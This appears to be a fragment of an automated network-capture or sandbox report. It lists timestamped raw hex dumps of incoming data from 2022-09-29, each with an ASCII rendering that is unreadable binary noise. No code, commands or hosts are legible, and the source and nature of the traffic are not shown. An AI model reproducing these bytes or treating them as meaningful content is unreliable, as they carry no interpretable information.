                                                                                                                                                2022-09-29 12:49:37 UTC8579INData Raw: ea cf 4f da aa a7 17 fc a1 cf 18 83 8e da de fd e8 c1 95 47 b7 65 18 20 84 4a 0a 8a f7 53 3c 29 bd 9e 13 a4 e6 93 96 cf 6b 47 8a 43 99 ee a2 f5 4f be 44 ad b2 b5 f5 ce 12 64 57 22 eb 21 06 b9 26 00 11 9f 2c cf cf f8 2f 6a 0d da 67 81 84 c0 b0 7d cb 9d 50 a4 2b dc 8a a3 8d ac 77 59 cc 8e 8a c7 d8 c9 03 38 49 2e 4e 75 d9 d9 d8 80 96 d3 23 98 a1 cb 12 53 e9 65 39 15 4a 6d d2 56 21 5d 04 e9 d0 aa 85 ba b1 bf 63 63 a3 dd 6c ee 9c a9 85 e8 36 f6 fb f9 4b d5 02 bc 4d f8 92 1a a5 c5 33 16 52 ff 31 57 e3 a9 47 61 1a bc 7f 60 2a 75 ad f8 28 0b df 99 cf 0a 95 51 e4 c7 5a 0b 19 a3 c0 4a 5a 6a fc 73 6e 9b a8 59 e7 17 4e d2 0d 74 54 32 23 66 15 26 62 34 33 34 0a 7c 39 46 d9 2c 93 f8 9d d7 d4 48 6a c9 0c 4e 8f 7a 1e dd e2 ba 9d e1 f8 1d a0 ff 4b aa 60 dd 15 1e 55 5a 0e
                                                                                                                                                Data Ascii: OGe JS<)kGCODdW"!&,/jg}P+wY8I.Nu#Se9JmV!]ccl6KM3R1WGa`*u(QZJZjsnYNtT2#f&b434|9F,HjNzK`UZ
                                                                                                                                                2022-09-29 12:49:37 UTC8595INData Raw: 7b 29 47 13 cb 7b 67 99 dd 29 38 92 c0 50 d9 3d 5a e3 5d 27 1f 51 a9 cf 8e 39 04 fe 0d 2f a4 1f 91 06 de 01 d5 e6 f9 3a 75 dc d6 76 0b f8 90 74 a0 6e 17 8a 7d 50 4b 4c d8 e7 9a 45 62 28 23 fa 06 5f 71 af ab 45 82 0b 75 c4 8f 68 d0 29 fc e0 bb 2f 79 b4 1f a6 df 3e c7 44 1e fd c1 1f e7 2a 11 c0 fc 94 2b 9f 80 81 a1 cd 29 16 05 0f 07 9e 14 c2 b2 24 6b ce d3 01 56 7e eb 79 46 90 84 b7 41 a7 44 01 84 74 f5 01 2f 12 47 22 70 0e 05 6a 99 e2 7c f6 71 6d 11 a7 2d 27 be d2 03 cb 92 f0 7e ac cb 87 22 48 be 07 95 24 53 f1 f2 ef 24 b1 08 b8 ce dc 42 ac 27 9c 05 6f b0 b0 4d aa 06 58 de fd 7c 77 40 bd 17 a8 80 6b 8a 38 86 48 14 5f df 0f 6b 7b 5a 93 1e bf 8a 3d cf 7e 63 eb 43 16 60 f8 7d 4c 62 ca 28 47 57 10 3a 1f d7 a1 8e 88 c0 5f 3f c2 ce af 9e 0b 5a 3e e3 05 27 18 e7
                                                                                                                                                Data Ascii: {)G{g)8P=Z]'Q9/:uvtn}PKLEb(#_qEuh)/y>D*+)$kV~yFADt/G"pj|qm-'~"H$S$B'oMX|w@k8H_k{Z=~cC`}Lb(GW:_?Z>'
                                                                                                                                                2022-09-29 12:49:37 UTC8611INData Raw: 6b e1 74 91 fd ad 5e 09 0a fc 93 30 b7 c2 35 d9 b8 f0 48 22 53 db 14 32 80 c6 f0 d4 b9 3f d9 8c be c8 25 04 4c 21 25 a5 51 9f 14 bf 1d 23 87 fe ac ae 94 96 55 a2 ca 1e b7 a6 cf c4 6f c3 ca 36 d4 b8 f0 44 6b bd 0e b3 37 6e 3a 5d 7a 04 42 1d 37 c8 1d f2 cb 28 14 88 48 51 de 2b b3 c9 ce 6e 2b 89 e5 5c 5c c1 da ea 81 19 a7 3c af 6d af 3f 76 96 c8 73 2f 47 42 84 92 02 c6 3b 7c 6a 20 6f 46 0c 5b 67 1c 2e 7f c0 0b 49 3e b3 09 9a d4 1e 82 41 42 fb b7 63 97 64 d8 96 ae 2c 56 e0 85 24 cc c8 86 e2 1c 87 ca 73 03 47 87 19 87 3a af 13 49 23 3d 69 c7 3d 65 03 70 51 a3 cb 5c 54 81 6b d0 f3 7b 68 e5 9a 88 f0 31 ad 7b 00 df 62 42 e9 fb 06 f7 3a c6 32 c1 72 87 bd 6b 6d 20 f8 d4 4d ef 3b b9 dc 96 34 10 b6 90 09 37 99 c2 13 50 b6 ba 50 fb 13 04 98 0c e7 2c 5e 97 a6 a6 e6 95
                                                                                                                                                Data Ascii: kt^05H"S2?%L!%Q#Uo6Dk7n:]zB7(HQ+n+\\<m?vs/GB;|j oF[g.I>ABcd,V$sG:I#=i=epQ\Tk{h1{bB:2rkm M;47PP,^
                                                                                                                                                2022-09-29 12:49:37 UTC8627INData Raw: 86 73 c8 50 68 a5 52 4a ba d3 92 12 64 8d 2a 11 05 b1 f6 06 cf 12 c4 f5 46 49 e5 eb e2 df 59 01 52 b8 67 e7 3a a2 ec 94 2c c7 82 96 30 67 cb 6f 2a 95 94 63 b2 ec 08 54 cb d9 61 6e 74 a8 2c a6 e5 9a 87 0f 1c d6 d2 2c 4b af 01 71 1a ec e0 be e3 64 e4 7e e7 61 0e fa b2 b6 87 3f a5 50 90 11 ea 86 43 e6 51 a3 60 f4 95 b9 60 1f a5 d3 b9 3e a6 4a 28 f5 76 70 37 00 3c 9e 5b c4 fd c8 5b 82 08 6d c8 d3 0a 30 77 0d 55 06 45 49 c3 9b 3a 16 16 08 b6 3a 3b 2b 45 a5 4e 35 c2 8f 3c a3 2b 4e ab 88 02 2b 54 19 3e bf 2d ff 48 5f fd 32 32 df f0 12 55 b5 7f 83 04 56 dd ac 50 4b 8d 92 d8 38 d7 59 52 b1 16 e6 5f 74 39 28 21 3c 22 42 35 e1 bf a0 32 cc 03 08 29 6a 53 e9 9e 3a 93 75 42 9f 6a a9 ae 1f 1d e2 c0 ba 32 15 bd 3d f7 88 54 3e aa df 8f b7 5a 0a 78 6a 36 22 bc 15 d4 f1 68
                                                                                                                                                Data Ascii: sPhRJd*FIYRg:,0go*cTant,,Kqd~a?PCQ``>J(vp7<[[m0wUEI::;+EN5<+N+T>-H_22UVPK8YR_t9(!<"B52)jS:uBj2=T>Zxj6"h
                                                                                                                                                2022-09-29 12:49:37 UTC8643INData Raw: 92 fa 34 31 f2 c2 dd 13 05 63 5a 73 3d 5d d5 8e b1 b5 e1 89 96 63 0d 1f 16 69 97 1c 19 e1 0a c4 94 f4 72 e8 50 aa 3f 4b 32 af 4d 6e c4 ac b8 2e 42 e2 42 82 51 4d 23 f5 1b 43 9e 5b 53 cf ab e9 a6 13 63 7f 15 08 98 b9 70 03 35 92 66 3a 37 be 0e 11 3b f7 55 72 1c 22 25 6a f1 c2 4f 03 94 9c 8a c6 56 b9 41 78 4f 9f 41 75 79 9b 08 24 4c bc d5 ad d4 b6 28 aa a5 e3 a6 81 d0 5c 27 f6 5a 98 47 67 17 4b 2b d7 7e f1 21 9e b9 c8 a0 7f f8 71 ef f0 c6 fa dc 1b 7b 49 7b d3 93 ba fb 9e 06 13 38 4b 6f ac 2b ce 11 ec 86 b5 39 1e f5 b9 fa 34 f1 7c 16 5c 1f e9 42 b2 89 13 4e dc 6d 78 45 c2 7f d6 02 12 f7 05 dd 19 1a d9 c9 f4 00 f7 62 53 45 66 7b 78 d7 47 be 26 18 7b 28 28 bf 1e 7a 5c 7d 40 79 81 3f 3a 18 92 9c 97 07 1b 57 cb 00 7b 95 26 d3 11 b3 95 9e 14 12 9a dc 93 7d 91 3f
                                                                                                                                                Data Ascii: 41cZs=]cirP?K2Mn.BBQM#C[Scp5f:7;Ur"%jOVAxOAuy$L(\'ZGgK+~!q{I{8Ko+94|\BNmxEbSEf{xG&{((z\}@y?:W{&}?
                                                                                                                                                2022-09-29 12:49:37 UTC8659INData Raw: 2e d1 98 22 25 b8 e6 6d 3a 9b 1b 1a 1e 6e 07 37 95 59 20 ef 32 f6 75 35 73 df 02 06 19 95 e1 8f 44 86 37 be 25 d1 70 42 00 1d 14 06 3f ca 6b 04 d2 cf 39 93 f9 c8 67 15 8a 43 a4 c9 d5 2f 03 7b f6 81 87 57 9e 9a 33 50 49 59 03 19 f5 7c b6 b9 07 5f 3e a9 54 72 63 db 83 34 95 87 90 ed 77 9b f8 27 5e df f5 24 08 48 9a 39 5d 83 ee f6 1d 0f 6f dd 1a 1c 28 e9 72 ad 29 9f 30 5f 26 83 44 f4 69 7a b8 f0 e8 b0 0c 35 eb 2c 8a 63 7d cb 28 fc 97 78 c3 e2 8c 8d dd 99 2b 3d 68 41 0a 61 91 4b f9 72 da 6a c9 67 4f 0a 78 9d b6 ba cb 2b 84 ce 35 be bc c0 ed 1a a2 07 19 78 9a 99 ee 5e 09 d1 66 68 9d dd e8 f7 07 0a 37 c0 18 fd 77 99 f1 ac 60 4e 61 68 51 28 0e b0 b6 e9 09 18 6b 3c 7b dd dc 2e 1f b4 64 d1 4c 0e c4 15 e5 49 b6 10 2d c6 31 f2 2a 99 0d 54 2b a1 83 17 e7 92 31 30 6d
                                                                                                                                                Data Ascii: ."%m:n7Y 2u5sD7%pB?k9gC/{W3PIY|_>Trc4w'^$H9]o(r)0_&Diz5,c}(x+=hAaKrjgOx+5x^fh7w`NahQ(k<{.dLI-1*T+10m
                                                                                                                                                2022-09-29 12:49:37 UTC8675INData Raw: 9a c1 0e 3d 7c b8 ec b7 93 ab 46 98 de 4e 2c e0 ef 02 6f fc cc 78 05 fd 91 72 8d d3 35 1a 6a c1 dc ac 5f df d0 8c 2d e8 16 c3 3b 88 f3 c9 ec 75 74 af 53 22 42 9e ba 95 55 06 53 95 b7 71 9b e9 8b 7d 4c 18 3f 4d 6d 7a 0d 50 ee e0 27 d6 ea cb 2b 52 10 9f fa e6 4e 97 c3 e7 eb c5 10 d9 7d d6 a8 c8 5a d6 ae 35 ad 6f 21 d5 d7 19 a0 09 73 c1 b7 f1 ff c7 ad 83 2e 68 43 55 47 75 ac 9e 66 c5 f1 ea da 55 dc 2b 75 c6 78 0e 38 8a d8 d5 99 3a 62 f5 54 f7 68 f8 1d cd b1 19 3b c1 cd 5b bb 91 f6 3e 11 15 2e 21 e4 d6 13 e5 72 5e 50 05 64 03 7b 47 22 f7 02 96 87 e5 75 f3 de 03 30 0a 73 84 80 67 12 d4 85 d7 74 31 12 04 af 81 5a ae 1f bb 02 be 08 c1 31 8d 14 eb d3 da b1 41 93 4e 37 bb 12 f0 46 23 bd 61 a1 05 ec 7b 4b d3 23 68 ec b7 8c b6 f9 40 23 b7 8b 4b 95 bf 17 5e e2 ba 3f
                                                                                                                                                Data Ascii: =|FN,oxr5j_-;utS"BUSq}L?MmzP'+RN}Z5o!s.hCUGufU+ux8:bTh;[>.!r^Pd{G"u0sgt1Z1AN7F#a{K#h@#K^?
                                                                                                                                                2022-09-29 12:49:37 UTC8691INData Raw: 4c 25 94 eb 14 67 40 82 d6 05 2b e1 55 39 d7 ab d4 98 2a cf 4b 9f 02 da 08 b3 69 3a e9 09 35 44 a9 bd b1 b9 79 02 75 90 5d 8a 5d 61 ad c8 7a 1d 9b 0c 3a d1 54 9f 62 41 67 25 cd 2f f4 33 b9 e2 d8 6f 91 45 38 53 ab ad 21 ca d2 e0 bd 0e 87 a1 5b 76 e8 85 98 36 d1 62 16 ca 25 de f8 c0 1e d3 14 80 b2 1d e7 3b e8 1f be 84 c0 a5 d9 c5 77 b0 fd a7 c1 b6 4a 1e cc a8 5a 91 5e ee 83 d5 44 0a ca 88 ba 88 54 07 65 36 cc 94 28 65 60 0f 20 99 0b 21 9a ce e2 8f 52 b7 e1 0f c0 69 b3 f5 bf d0 de 1e dc c2 dc 54 1b 37 49 f6 38 04 f8 1a a1 33 68 b0 14 17 ef ce 7e 2d 17 f0 3a 7d b4 8c 73 6b 4b 41 25 f7 f3 7a a5 49 b2 b6 92 3a 50 cb 54 82 9f 1a 86 9c 3b 98 b0 9e b9 80 f1 82 d3 d6 22 d4 f5 e5 f4 d8 a1 b4 a0 ed 4b a8 37 c4 50 91 8f 24 b8 2a 8a 3d 31 d1 12 cd d6 ae bb 11 f5 2a 4c
                                                                                                                                                Data Ascii: L%g@+U9*Ki:5Dyu]]az:TbAg%/3oE8S![v6b%;wJZ^DTe6(e` !RiT7I83h~-:}skKA%zI:PT;"K7P$*=1*L
                                                                                                                                                2022-09-29 12:49:37 UTC8707INData Raw: 84 3b 7d fc 17 86 44 d7 8d f5 be e4 6c 26 d8 d8 e3 65 cb b0 e6 99 86 ae 36 13 d9 99 a9 1e 7a ed 59 6a ce b8 a7 a0 85 56 f1 d1 72 b4 cf df dd d9 37 9b b5 bb 06 b0 7b a3 24 a8 c0 e9 7c af 3c 3c b3 a5 79 6b 45 aa fa f7 07 5f ee 60 6c 47 21 3a ac 26 f1 f2 1f 72 b2 75 94 e4 f0 0e 5e 61 fb b6 54 6e ef ed e2 aa c4 27 cf 1f e2 38 99 bf 5e 4a a8 38 3b 19 2d e4 92 3f 26 73 78 c3 bb ab b2 56 6a c9 22 a5 d1 f8 0a f3 0d 72 9d ae 0c 00 6a 07 2f 5c 78 e9 3e 8f 56 e6 27 b1 8a 37 fa 11 9b 3e 13 ec 20 1d 1e e2 d1 74 68 ad 17 f4 25 a8 c8 1b f8 3d 73 32 1f 1c a0 81 f4 48 03 c9 2f d0 de b6 c6 8b c0 62 35 36 48 5a 81 7f d8 14 8b a1 a2 5d fe 78 25 74 13 91 36 e8 1d 6d 66 ba af 86 75 f2 5d c5 b8 d2 2b 4e 6c be 62 88 77 f3 e3 0a 20 3c 24 fb ab 9f a0 ee 1a 0f c6 96 fe f7 18 9f 24
                                                                                                                                                Data Ascii: ;}Dl&e6zYjVr7{$|<<ykE_`lG!:&ru^aTn'8^J8;-?&sxVj"rj/\x>V'7> th%=s2H/b56HZ]x%t6mfu]+Nlbw <$$
                                                                                                                                                2022-09-29 12:49:37 UTC8723INData Raw: e2 b9 a7 45 b1 28 0a 47 ed f3 7e f8 e6 12 97 13 81 b0 c3 46 b6 8f 1e bf 70 68 e3 39 09 98 b8 5d 13 c6 22 f2 f7 c5 c7 91 89 ec 0c 1a 72 27 30 5e f9 99 83 9f 13 e0 7e 43 d8 6a 22 ab 7e bd cb 62 d8 7c c5 f6 89 8b 91 ec 3b 54 23 0d 7a d9 23 e2 de 40 22 af 1b db 49 7c c0 c5 6c 0f 9e ad 64 ab 0b 51 e2 7d 37 60 63 08 fc 24 51 db 2b e8 27 ca 6e 6f 9a 50 1e c8 b8 c8 09 65 22 d1 0e 1d 51 a5 ee 7f 7c b9 79 2c 1f eb f3 8e a9 7b 29 b6 41 97 67 aa b8 40 65 84 9a 84 88 55 b3 d4 06 b7 dc 9a 7f 48 f2 58 33 61 98 a9 40 76 39 d7 eb 44 69 45 1a 81 98 11 34 9f bd 58 f2 6d 94 dc 99 be 4a 9e 4e 99 03 ac 4b 16 0e 07 d0 da 9e 1f e0 22 9f b5 04 e3 79 4c e6 14 e5 82 02 48 80 d4 de 86 93 71 71 fd 98 2d 32 6e f5 9b 65 d7 dc ed a4 f1 68 14 70 b5 a9 e4 7a f4 cf 24 36 1c f4 b7 3a 65 8a
                                                                                                                                                Data Ascii: E(G~Fph9]"r'0^~Cj"~b|;T#z#@"I|ldQ}7`c$Q+'noPe"Q|y,{)Ag@eUHX3a@v9DiE4XmJNK"yLHqq-2nehpz$6:e
                                                                                                                                                2022-09-29 12:49:37 UTC8739INData Raw: 41 2a 86 26 74 24 c1 cc 8a f7 c1 d9 72 c1 7c 67 3b c1 1c ad dd 5a e4 b7 99 dc c9 53 92 41 4e ed 01 84 62 6e 8c 2d 9a f6 b9 d7 58 2c 69 ff 3e a1 30 0d 40 5f c9 70 d2 42 26 20 9c 77 7c 34 2f 82 95 0a 79 d5 47 a2 1f 01 8f d0 da be f0 df 06 e6 59 40 bd e9 ef b0 b5 9a ed 55 a7 b0 9e ca 42 5e 96 fc f0 91 0e 0c 9a 9f aa 6a 02 2b a6 66 08 7e 0f cf c0 41 6f 5a f7 c0 5f 98 7b ac 59 3a 4f 1e d7 bb bb 17 ec 85 fe 6f fb cc ee 67 5a f4 9f a7 c6 30 37 e6 d1 22 e4 6e a7 fa d0 c1 89 23 f2 8d 0f 91 87 16 a7 27 dc 3b 38 eb 58 8c 42 61 ba 48 e6 7e 3d 21 19 50 e3 89 ff b4 22 75 4a ca c7 09 06 d7 87 3d 09 60 f8 c6 5c d2 5f 0f c6 05 f7 98 7a ef 5e 21 3a b8 3d c9 22 4d 3a 81 22 3a fa 89 a9 2a d8 51 b8 f7 a1 88 d3 75 1d df bc 5c 0e 93 e4 13 05 20 ef 48 41 be 8a 4a a3 b9 f8 f9 ac
                                                                                                                                                Data Ascii: A*&t$r|g;ZSANbn-X,i>0@_pB& w|4/yGY@UB^j+f~AoZ_{Y:OogZ07"n#';8XBaH~=!P"uJ=`\_z^!:="M:":*Qu\ HAJ
                                                                                                                                                2022-09-29 12:49:37 UTC8755INData Raw: 25 f6 ed 62 ea 2a 1a 5c 60 ef fa c2 58 ee f4 7d 35 bb e0 17 35 e2 75 1d f3 3c dd cd 47 3f 2b 4f 4c 04 59 11 f4 7e 8c 0c 05 20 6b a7 f7 3b 3f 62 8c a1 74 bf a3 fc 9d 29 e0 85 2b be a4 b2 e1 fb 4a f8 4e e6 33 e6 10 f0 b4 fe bd 7e 81 da c1 67 e7 0e 08 e0 ae e9 42 93 ba 6e dd c3 32 c1 fd 09 6f 04 74 3a 0a 05 14 c4 c2 51 89 9e 32 8a bb 6c 41 4f d1 8d 8e 18 2c 33 45 6f e2 99 76 cc 28 3d 9a 92 b2 87 5d 8b f4 b5 cb 09 c1 3e 66 ce 45 80 ba b4 35 91 17 69 2d a9 71 d9 8f f3 12 9c f3 d2 e6 37 ae 73 56 0e 8f ca 63 03 84 7b fa 53 0e 61 19 68 5f 6a 30 e5 f1 c0 82 28 53 31 25 ff f2 a4 4a f2 90 ae af 96 68 d9 c5 c6 39 38 53 b3 87 b8 55 4e 5c 9c 65 e2 bc a6 38 61 6d 26 57 5d ae ec 9c 19 7d 44 b4 16 2b f5 36 d8 7a cb 76 a2 99 2b ab c6 20 a4 50 49 79 f2 48 fa 17 a7 4a be 35
                                                                                                                                                Data Ascii: %b*\`X}55u<G?+OLY~ k;?bt)+JN3~gBn2ot:Q2lAO,3Eov(=]>fE5i-q7sVc{Sah_j0(S1%Jh98SUN\e8am&W]}D+6zv+ PIyHJ5
                                                                                                                                                2022-09-29 12:49:37 UTC8771INData Raw: ab 42 fc 73 4c e6 de 07 c8 4b d3 7b be dc ac 9e 30 16 6f ec b3 65 1e 84 15 31 f9 c0 f2 50 8e a8 f9 d0 d6 6d 64 44 91 b3 ae 0e 5c e6 e5 21 8e 46 15 08 70 f6 bc 6d 7a 0f bc 78 da d5 90 c2 90 33 95 26 74 0a ec 6f f3 d6 2b aa 9c 0f 76 4e e0 ab 29 d4 05 cd 74 32 fa 5a e8 05 6c 54 c6 b2 25 19 e9 ea 13 48 01 92 43 69 94 45 38 0d 56 41 7f 1f 21 e8 b4 a3 7a e1 98 c8 e5 e1 a7 ed 53 69 bb b1 15 70 65 e4 c6 b7 74 f8 ef 7a 1f 4f e5 d8 53 de 51 25 71 8a c3 7a 6d ce 06 98 43 79 d5 23 c4 54 b4 af 19 33 1f ba d9 bc 61 1b c5 36 dc 43 3f a3 c5 4d 36 3d fe b1 6a 92 96 cb 2a e6 eb 0a e1 13 12 bd 12 6b 7d 7b 3f ab e3 30 cd 83 35 06 ff e9 58 4a 58 3d 4d bf 9c 1d cd 5b 0b ac 3e 3e dd 67 6a 86 a0 42 e0 ac d7 9c f8 61 ed c3 d8 0a dd 58 7c 1b 27 fc 43 58 66 bf 94 c0 fc d0 2f 2d ba
                                                                                                                                                Data Ascii: BsLK{0oe1PmdD\!Fpmzx3&to+vN)t2ZlT%HCiE8VA!zSipetzOSQ%qzmCy#T3a6C?M6=j*k}{?05XJX=M[>>gjBaX|'CXf/-
                                                                                                                                                2022-09-29 12:49:37 UTC8781INData Raw: 70 e1 52 f4 b6 6a 4c 81 45 e6 8e 31 58 3b 36 30 56 23 18 02 b5 76 af 9a a4 70 fc 50 93 87 69 eb f8 42 24 56 31 78 70 fb 0b 12 43 d6 a3 9c cd b0 82 9b f0 ae af 04 17 1f 9d 3c 37 3d 5c 7a a0 1f c7 9f 2a 30 25 47 29 05 d8 a4 c8 b8 43 66 86 d8 42 45 38 04 e3 ba 74 ff 67 47 59 9f 27 bc 83 ea 37 20 89 b0 36 9b f7 35 45 e9 d3 b5 56 9d 51 d9 09 58 03 7d ec 25 c1 f5 c0 ea cf c5 18 87 42 06 5f 97 2e 18 7b b9 21 72 d9 3b d2 cf dd e8 63 bd bd d1 16 18 ce 02 e0 a8 9a f8 00 f4 cf fb fe fb fa 75 d2 3f 9b e3 75 ed 48 18 13 68 45 83 e1 ca 5f 64 15 fa ad de 44 76 a5 75 06 93 89 3e f4 01 ba 5c 3d a1 27 c2 5f f4 c1 0c 37 d5 b4 54 de ea 9b 32 70 83 10 e5 95 ca c4 3b 27 34 08 e3 fd b8 aa dc 9c 71 ac 4c b1 bc 12 c8 1e 9d 8d 8e 1f ae 70 a3 5e 08 47 dc ec 15 db 04 29 91 26 45 16
                                                                                                                                                Data Ascii: pRjLE1X;60V#vpPiB$V1xpC<7=\z*0%G)CfBE8tgGY'7 65EVQX}%B_.{!r;cu?uHhE_dDvu>\='_7T2p;'4qLp^G)&E
                                                                                                                                                2022-09-29 12:49:37 UTC8797INData Raw: 27 34 54 9a 85 80 72 fd e0 e0 a9 05 4b ae 9c d4 91 31 ef 45 57 3d c8 d2 eb be 62 ce a1 36 f2 21 30 1d 8d 88 b5 52 69 8e 8a 03 5a d6 d5 15 d4 f8 98 23 a5 ce ea b9 10 da 63 f3 64 2b 84 3e 6f 28 c3 5e 37 9d 9f 3d 45 e3 57 a2 48 84 d4 f7 12 81 ce 8b e9 9f f5 69 ff ae d5 df 8c 61 d7 2d ba 6a 14 a5 69 93 a7 f6 1e 32 39 2a cb d4 cd 8b db 3d d2 80 7d 1d b9 4d 73 6d bf e0 b4 a2 3a 74 05 41 b2 1c 91 89 ef e4 ba 5c b7 4f 3c ed 59 aa 22 24 0a ae ff 1f 59 4c cd 4c 1f f4 a1 b8 04 61 66 3d 37 66 65 85 39 c9 15 03 40 52 1a 2e 88 86 80 6e 89 ec fa 27 b3 58 55 cd 61 a9 06 4f d1 59 1a 9d 5d 1c 67 c3 13 67 53 7a 7d 22 94 a0 dc 77 c1 13 0e 2d 75 1e 4b 57 a6 44 0c bf 40 33 43 81 26 b2 c7 a9 ed 12 92 1e 95 c5 94 ec bb 3a 61 8b f1 79 19 b4 88 73 bc b7 70 1f 9e 05 d8 4c 1d 26 18
                                                                                                                                                Data Ascii: '4TrK1EW=b6!0RiZ#cd+>o(^7=EWHia-ji29*=}Msm:tA\O<Y"$YLLaf=7fe9@R.n'XUaOY]ggSz}"w-uKWD@3C&:ayspL&
                                                                                                                                                2022-09-29 12:49:37 UTC8813INData Raw: 1f 4f ae 7a ac 5a 31 6a 63 58 f3 c4 72 72 a9 2e bd 19 82 78 eb 6d 7f 45 d7 f0 ef 19 6b 49 6f be a5 34 65 0a ed d5 66 40 59 56 ef fc fd 71 f0 60 1e df ef 8d 3f c3 f1 68 9c 16 1f 21 1c f4 59 e5 5f 8e d3 79 93 cd 00 3b e4 14 2d cc fe 6b d3 83 68 4b 4f 13 51 f7 cd b1 a2 a8 42 ca 33 71 fb ea ea 00 2c d4 5d 1a 4e 1e dc 05 92 9e d1 dd 27 f2 49 0c 54 b6 eb 00 7e 3a 0c 4d 65 97 3b 3d ad d3 12 50 1b 55 4c 71 d2 ac 3e 36 6a ab 55 2a 99 ee bd 11 68 d4 36 12 90 2e c0 3f ab 8d dc 1c 07 39 5d 80 54 0a 00 99 09 2f 56 a5 d5 5f 62 e5 23 fe 2a c7 e3 cc 34 62 8b dd 97 5a 02 b7 a5 b8 78 76 1b 3d b4 7b 16 4d 80 4b a7 32 c5 aa 7e 87 a1 70 03 85 c3 0b a3 1a c6 cf 2f 06 d1 9a 34 58 fa 4a cd f7 0a 25 88 71 37 a4 aa 0a 63 d8 cf 27 66 59 3c 22 76 11 58 36 f5 0d 5f a9 09 33 79 3a 4f
                                                                                                                                                Data Ascii: OzZ1jcXrr.xmEkIo4ef@YVq`?h!Y_y;-khKOQB3q,]N'IT~:Me;=PULq>6jU*h6.?9]T/V_b#*4bZxv={MK2~p/4XJ%q7c'fY<"vX6_3y:O
                                                                                                                                                2022-09-29 12:49:37 UTC8829INData Raw: 63 9a d0 fe 4d 02 f2 e2 7b 7d d7 fa 2f d1 ec d7 37 eb 47 33 8f 55 35 47 d9 e5 95 54 d5 48 78 6a ee 49 41 2e ee 5b 2f 86 a9 a3 b6 81 b6 7c dc 6b 9a 77 6b 76 05 24 f0 a8 60 eb 8d 29 74 91 ad a1 05 1a 20 9b dc 11 d7 43 22 90 22 e7 d7 56 7f a5 53 76 d5 3f ff 62 63 97 98 79 67 3c 33 92 e4 fa ed 13 51 3f 64 ec ef 4d c6 b5 c1 88 81 6a 80 92 98 8b 7e db 22 ae 01 b2 d0 d3 bd 55 4f 50 67 38 a5 23 18 24 ed 3c 65 2b ae 88 80 b7 4f 27 9b 98 0c 3a 10 7d 5e 10 13 be 3f 1e 3c 1e 13 6b b6 db 55 c6 14 90 54 a7 b2 35 b0 bf c2 b6 8b 0f 4e dd 9f 59 33 f6 b7 92 37 07 84 d1 62 28 0e 59 1f 44 5f a5 41 0a ae 28 9d c9 ad e4 54 f5 05 69 aa d9 dc f7 dd f0 d4 b6 44 c7 06 39 2d 11 cc 6d 0d fe 24 88 53 7c ba 45 08 b6 23 87 f8 66 71 90 19 09 e7 66 23 67 53 6f fa 21 c4 64 23 37 02 fe 73
                                                                                                                                                Data Ascii: cM{}/7G3U5GTHxjIA.[/|kwkv$`)t C""VSv?bcyg<3Q?dMj~"UOPg8#$<e+O':}^?<kUT5NY37b(YD_A(TiD9-m$S|E#fqf#gSo!d#7s
                                                                                                                                                2022-09-29 12:49:37 UTC8845INData Raw: 1f 7a 34 1d 1d 64 1d e2 23 46 8d 68 7f b6 6a d2 3c 4b 76 e3 a2 32 2d d1 c7 de a4 8c 90 0c 0c 0c cc 31 6d eb f7 fd f5 cd e8 6e 99 64 03 eb 3c 85 56 d9 78 64 13 61 be c5 0c 47 0a aa 2b c5 45 26 e6 4c 9d 7d e6 11 96 22 7d 86 32 a9 5f 19 12 13 9f a5 c5 5b 94 0d 50 41 0c b2 34 6c c0 ad d6 77 7e fd f6 38 fc 20 2e 33 83 84 73 5f 4c 81 69 1c 4a 70 b4 25 35 6a 22 07 0e 82 44 62 69 85 98 18 28 04 b6 80 7f 8c 95 2c a3 81 95 5b a3 2c d2 ca 23 1b a3 9d 75 fd c9 18 69 58 e6 73 b2 76 43 35 88 58 37 6a d6 b5 ab fe f2 ae 3f cc df d1 ba c3 a5 fc 54 04 01 3c 53 6f 50 94 ee 1f db 68 33 df 69 44 e9 a5 97 bc a0 cd 7d 0e 0e f3 a2 5e a8 e8 0d 45 41 55 5a f5 cd 8b 79 33 a1 27 64 c2 ce b5 f4 10 9a 43 ed e6 2a b9 de e2 f8 4f 14 8e d1 78 6b 6b 53 68 2c 77 f4 e4 3a ef dc 82 2f d7 22
                                                                                                                                                Data Ascii: z4d#Fhj<Kv2-1mnd<VxdaG+E&L}"}2_[PA4lw~8 .3s_LiJp%5j"Dbi(,[,#uiXsvC5X7j?T<SoPh3iD}^EAUZy3'dC*OxkkSh,w:/"
                                                                                                                                                2022-09-29 12:49:37 UTC8861INData Raw: 84 15 35 3f e9 09 3e 42 e1 14 26 5a f4 9b 1e ae 44 9a 89 c9 0e 8c 5b 37 45 e9 0e 82 72 94 f7 c7 e5 36 03 5a 0f 44 92 ea 1c f4 8c ee fb 09 88 77 c1 1c e2 0c d2 af 9a ca a7 99 bd 00 d9 50 88 65 37 3c b8 59 1d 2c 39 e7 a8 04 85 e9 0e 2c 59 19 97 50 65 92 fd 04 d6 3d 95 04 4d 51 c0 1d 8a 98 5f 68 b2 f9 8f d1 8d 01 e6 c1 3e 48 fc 6b d8 c4 6a 86 e3 d3 d5 92 53 09 64 69 74 ae dc df d6 c9 0a 19 dc 73 13 f9 1c 9b 46 b8 d4 18 ab 83 88 68 7a 57 d5 db 14 47 a9 50 98 51 ec 4e ed da 1e 0c 05 5e 56 86 a8 1c a8 cd a5 73 f7 0e f0 42 27 a8 25 6a 09 c2 79 eb 39 da 58 d4 89 61 de 1d 22 3d 05 59 8b 6e a3 6c db 17 fb ef 59 43 68 a5 11 04 0e 08 8a 68 fc ac 16 e4 2e dc d5 c5 4e 76 86 6e 6a 99 ee bf f6 07 b6 b9 10 4b b5 6d 27 aa da 73 72 e7 23 55 4b 2b f7 ec a8 58 7c f3 a9 73 29
                                                                                                                                                Data Ascii: 5?>B&ZD[7Er6ZDwPe7<Y,9,YPe=MQ_h>HkjSditsFhzWGPQN^VsB'%jy9Xa"=YnlYChh.NvnjKm'sr#UK+X|s)
